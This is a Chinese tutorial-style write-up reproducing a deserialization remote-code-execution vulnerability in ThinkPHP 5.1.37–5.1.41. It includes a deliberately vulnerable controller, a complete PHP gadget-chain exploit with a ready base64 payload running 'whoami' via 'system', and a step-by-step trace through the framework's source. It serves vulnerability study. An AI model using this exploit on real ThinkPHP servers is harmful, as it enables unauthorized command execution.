溫馨提示×
您好,登錄后才能下訂單哦!
點擊 登錄注冊 即表示同意《億速云用戶服務條款》
您好,登錄后才能下訂單哦!
這期內容當中小編將會給大家帶來有關如何理解Thinkphp5.1.37-5.1.41(最新版本) 反序列化漏洞復現,文章內容豐富且以專業的角度為大家分析和敘述,閱讀完這篇文章希望大家可以有所收獲。
記錄自己學習與理解thinkphp的反序列漏洞的過程
5.1.37-5.1.41(最新版本)
1、composer create-project topthink/think=5.1.37 v5.1.37(5.1.37-5.1.41都可)
2、github:
https://github.com/top-think/think/releases
https://github.com/top-think/framework/releases
先添加一個反序列化的入口
在application\index\controller\index.php中將input參數反序列化
<?php
namespace app\index\controller;
class Index
{
public function index($input='')
{
unserialize(base64_decode($input));
return '<style type="text/css">*{ padding: 0; margin: 0; } div{ padding: 4px 48px;} a{color:#2E5CD5;cursor: pointer;text-decoration: none} a:hover{text-decoration:underline; } body{ background: #fff; font-family: "Century Gothic","Microsoft yahei"; color: #333333;font-size:18px;} h2{ font-size: 100px; font-weight: normal; margin-bottom: 12px; } p{ line-height: 1.6em; font-size: 42px }</style><div > <h2>:) </h2><p> ThinkPHP V5.1<br/><span >12載初心不改(2006-2018) - 你值得信賴的PHP框架</span></p></div><script type="text/javascript" src="https://tajs.qq.com/stats?sId=64890268" charset="UTF-8"></script><script type="text/javascript" src="https://e.topthink.com/Public/static/client.js"></script><think id="eab4b9f840753f8e7"></think>';
}
public function hello($name = 'ThinkPHP5')
{
return 'hello,' . $name;
}
}EXP:
<?php
namespace think;
abstract class Model{
protected $append = [];
private $data = [];
function __construct(){
$this->append = ["ethan"=>["dir","calc"]];
$this->data = ["ethan"=>new Request()];
}
}
class Request
{
protected $hook = [];
protected $filter = "system";
protected $config = [
// 表單請求類型偽裝變量
'var_method' => '_method',
// 表單ajax偽裝變量
'var_ajax' => '_ajax',
// 表單pjax偽裝變量
'var_pjax' => '_pjax',
// PATHINFO變量名 用于兼容模式
'var_pathinfo' => 's',
// 兼容PATH_INFO獲取
'pathinfo_fetch' => ['ORIG_PATH_INFO', 'REDIRECT_PATH_INFO', 'REDIRECT_URL'],
// 默認全局過濾方法 用逗號分隔多個
'default_filter' => '',
// 域名根,如thinkphp.cn
'url_domain_root' => '',
// HTTPS代理標識
'https_agent_name' => '',
// IP代理獲取標識
'http_agent_ip' => 'HTTP_X_REAL_IP',
// URL偽靜態后綴
'url_html_suffix' => 'html',
];
function __construct(){
$this->filter = "system";
$this->config = ["var_ajax"=>''];
$this->hook = ["visible"=>[$this,"isAjax"]];
}
}
namespace think\process\pipes;
use think\model\concern\Conversion;
use think\model\Pivot;
class Windows
{
private $files = [];
public function __construct()
{
$this->files=[new Pivot()];
}
}
namespace think\model;
use think\Model;
class Pivot extends Model
{
}
use think\process\pipes\Windows;
echo base64_encode(serialize(new Windows()));
/*input=TzoyNzoidGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzIjoxOntzOjM0OiIAdGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzAGZpbGVzIjthOjE6e2k6MDtPOjE3OiJ0aGlua1xtb2RlbFxQaXZvdCI6Mjp7czo5OiIAKgBhcHBlbmQiO2E6MTp7czo1OiJldGhhbiI7YToyOntpOjA7czozOiJkaXIiO2k6MTtzOjQ6ImNhbGMiO319czoxNzoiAHRoaW5rXE1vZGVsAGRhdGEiO2E6MTp7czo1OiJldGhhbiI7TzoxMzoidGhpbmtcUmVxdWVzdCI6Mzp7czo3OiIAKgBob29rIjthOjE6e3M6NzoidmlzaWJsZSI7YToyOntpOjA7cjo5O2k6MTtzOjY6ImlzQWpheCI7fX1zOjk6IgAqAGZpbHRlciI7czo2OiJzeXN0ZW0iO3M6OToiACoAY29uZmlnIjthOjE6e3M6ODoidmFyX2FqYXgiO3M6MDoiIjt9fX19fX0=&id=whoami*/
?>5.1.37版本復現:
5.1.41版本復現
首先了解下魔法函數,方便后面利用鏈的理解。
__construct():當對象創建(new)時會自動調用。但在unserialize()時是不會自動調用的。
__destruct():當對象被銷毀時會自動調用。
__call():是在對象上下文中調用不可訪問的方法時觸發
__callStatic():是在靜態上下文中調用不可訪問的方法時觸發。
__get():用于從不可訪問的屬性讀取數據。
__set():用于將數據寫入不可訪問的屬性。
__isset():在不可訪問的屬性上調用isset()或empty()觸發。
__unset():在不可訪問的屬性上使用unset()時觸發。
__sleep():在執行序列化函數serialize()時執行。
__wakeup():在執行反序列化函數unserialize()時執行。
__toString():當一個對象被當做字符串使用。
invoke():腳本嘗試將對象調用為函數時,調用invoke()方法。
反序列化的常見起點
__wakeup:一定會調用
__destruct:一定會調用
__toString:當一個對象被反序列化后又被當做字符串使用
反序列化的常見中間跳板
__toString:當一個對象被當做字符串使用
__get:讀取不可訪問或不存在屬性時被調用
__set:當給不可訪問或不存在屬性賦值時被調用
__isset:對不可訪問或不存在的屬性調用isset()或empty()時被調用
形如 $this->$func();
反序列化的常見終點:
__call:調用不可訪問或不存在的方法時被調用
call_user_func:一般php代碼執行都會選擇這里
call_user_func_array:一般php代碼執行都會選擇這里
從EXP入手去分析整個利用過程,在執行EXP時動態調試觀察調用了哪些魔法函數
可以看到依次執行了destruct()→tostring()→call()→RCE
從起點開始一步一步跟進
1、在\thinkphp\library\think\process\pipes\windows.php中的__destruct調用了removeFiles方法
主要代碼:
public function __destruct()
{
$this->close();
$this->removeFiles();
}
private function removeFiles()
{
foreach ($this->files as $filename) {
if (file_exists($filename)) {
@unlink($filename);
}
}
$this->files = [];
}這里$filename會被當做字符串處理,而下一步的toString方法在一個對象被反序列化后又被當做字符串使用時會被觸發,繼續跟進toString方法
2、在\thinkphp\library\think\model\concern\Conversion.php中__toString中的函數執行過程為toJson→toArray
主要代碼:
//thinkphp\library\think\model\concern\Conversion.php
public function __toString()
{
return $this->toJson();
}
public function toJson($options = JSON_UNESCAPED_UNICODE)
{
return json_encode($this->toArray(), $options);
}
緊接著下一步調用了visible與call方法,猜測visible是一個不存在的方法,并自動調用了call;繼續看toArray方法的邏輯部分
主要代碼:
//thinkphp\library\think\model\concern\Conversion.php
public function toArray()
{
$item = [];
$hasVisible = false;
...
if (!empty($this->append)) {
foreach ($this->append as $key => $name) {
if (is_array($name)) {
// 追加關聯對象屬性
$relation = $this->getRelation($key);
if (!$relation) {
$relation = $this->getAttr($key);
if ($relation) {
$relation->visible($name);
}
}
}這里的$this->append是我們可控的,這意味著$relation也可控,在toArray函數中調用一個getRelation()方法和一個getAttr()方法,在下面判斷了變量$relation,若!$relation,繼續調用getAttr()方法, 跟進getRelation方法
主要代碼:
//thinkphp\library\think\model\concern\RelationShip.php
public function getRelation($name = null)
{
if (is_null($name)) {
return $this->relation;
} elseif (array_key_exists($name, $this->relation)) {
return $this->relation[$name];
}
return;
}可以看到getRelation()執行結果返回為空,進而執行了getAttr(),繼續跟進getAttr()
//thinkphp\library\think\model\concern\Attribute.php
public function getAttr($name, &$item = null)
{
try {
$notFound = false;
$value = $this->getData($name);
} catch (InvalidArgumentException $e) {
$notFound = true;
$value = null;
}
return $value;
}
public function getData($name = null)
{
if (is_null($name)) {
return $this->data;
} elseif (array_key_exists($name, $this->data)) {
return $this->data[$name];
} elseif (array_key_exists($name, $this->relation)) {
return $this->relation[$name];
}
throw new InvalidArgumentException('property not exists:' . static::class . '->' . $name);
}這里的getAttr()調用了getData()方法,所以toArray方法中的$relation的值為$this->data[$name],也就是說$relation可控;然后控制$relation為一個類對象,調用不存在的visible方法后,會自動調用call方法,這個類中沒有visible方法,但存在call,跟進__call
3、/thinkphp/library/think/Request.php中的__call方法的主要代碼:
public function __call($method, $args)
{
if (array_key_exists($method, $this->hook)) {
array_unshift($args, $this);
return call_user_func_array($this->hook[$method], $args);
}
throw new Exception('method not exists:' . static::class . '->' . $method);
}可以看到存在了回調函數call_user_func_array,并且this->hook[$method]我們可以控制,但是這里有個 array_unshift($args, $this);會把$this放到$arg數組的第一個元素,這樣構造不出來參數可用的payload,因為第一個參數是$this對象。
在利用鏈中發現,最終RCE是利用了Requests類的過濾器filter(多數RCE都是出自此處),調試器中依次調用了isAjax(),param(),input(),跟進這些方法,觀察是如何執行的
4、在\thinkphp/library/think/Request.php的查看各個方法的主要代碼
public function isAjax($ajax = false)
{
$value = $this->server('HTTP_X_REQUESTED_WITH');
$result = 'xmlhttprequest' == strtolower($value) ? true : false;
if (true === $ajax) {
return $result;
}
$result = $this->param($this->config['var_ajax']) ? true : $result;
$this->mergeParam = false;
return $result;
}在isAjax函數中,我們可以控制$this->config['var_ajax'],這里調用了param方法,繼續跟進
public function param($name = '', $default = null, $filter = '')
{
if (!$this->mergeParam) {
$method = $this->method(true);
.....
$this->param = array_merge($this->param, $this->get(false), $vars, $this->route(false));
$this->mergeParam = true;
}
if (true === $name) {
// 獲取包含文件上傳信息的數組
$file = $this->file();
$data = is_array($file) ? array_merge($this->param, $file) : $this->param;
return $this->input($data, '', $default, $filter);
}
return $this->input($this->param, $name, $default, $filter);
}這里在最后調用了input()函數,由于之前的isAjax()中$this->config['var_ajax']可控,所以這里param($name)可控,跟進input()
public function input($data = [], $name = '', $default = null, $filter = '')
{
if (false === $name) {
// 獲取原始數據
return $data;
}
....
// 解析過濾器
$filter = $this->getFilter($filter, $default);
if (is_array($data)) {
array_walk_recursive($data, [$this, 'filterValue'], $filter);
.....
} else {
$this->filterValue($data, $name, $filter);
}input()使用回調函數調用了filterValue(),由于param中的$name可控,所以input()中的$name可控,然后input()中又調用了filterValue(),這樣的話filterValue()中的$name也就是可控的,跟進filterValue()
主要代碼:
private function filterValue(&$value, $key, $filters)
{
$default = array_pop($filters);
foreach ($filters as $filter) {
if (is_callable($filter)) {
// 調用函數或者方法過濾
$value = call_user_func($filter, $value);該方法調用了call_user_func函數,從input()中得知,filterValue()的value值可控
繼續查看input()的主要代碼部分:
public function input($data = [], $name = '', $default = null, $filter = '')
{
if (false === $name) {
// 獲取原始數據
return $data;
}
....
$data = $this->getData($data, $name);
....
// 解析過濾器
$filter = $this->getFilter($filter, $default);
if (is_array($data)) {
array_walk_recursive($data, [$this, 'filterValue'], $filter);
.....
} else {
$this->filterValue($data, $name, $filter);
}這里$data=$this->getData($data, $name)
$filter = $this->getFilter($filter, $default)
兩個關鍵的參數,跟進getData()代碼:
protected function getData(array $data, $name)
{
foreach (explode('.', $name) as $val) {
if (isset($data[$val])) {
$data = $data[$val];
} else {
return;
}
}
return $data;
}$name由在最開始的isAjax()中的$this->config['var_ajax']來控制,最終返回$data=$data[$name]
getFilter()代碼:
protected function getFilter($filter, $default)
{
if (is_null($filter)) {
$filter = [];
} else {
$filter = $filter ?: $this->filter;
if (is_string($filter) && false === strpos($filter, '/')) {
$filter = explode(',', $filter);
} else {
$filter = (array) $filter;
}
}
$filter[] = $default;
return $filter;
}這里$filter可控,$this->filter,在EXP直接賦值即可,這樣所有可控條件都達成,成功RCE
總結一下:
利用鏈:
從EXP的角度下看執行過程:
官方未修復
上述就是小編為大家分享的如何理解Thinkphp5.1.37-5.1.41(最新版本) 反序列化漏洞復現了,如果剛好有類似的疑惑,不妨參照上述分析進行理解。如果想知道更多相關知識,歡迎關注億速云行業資訊頻道。
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。
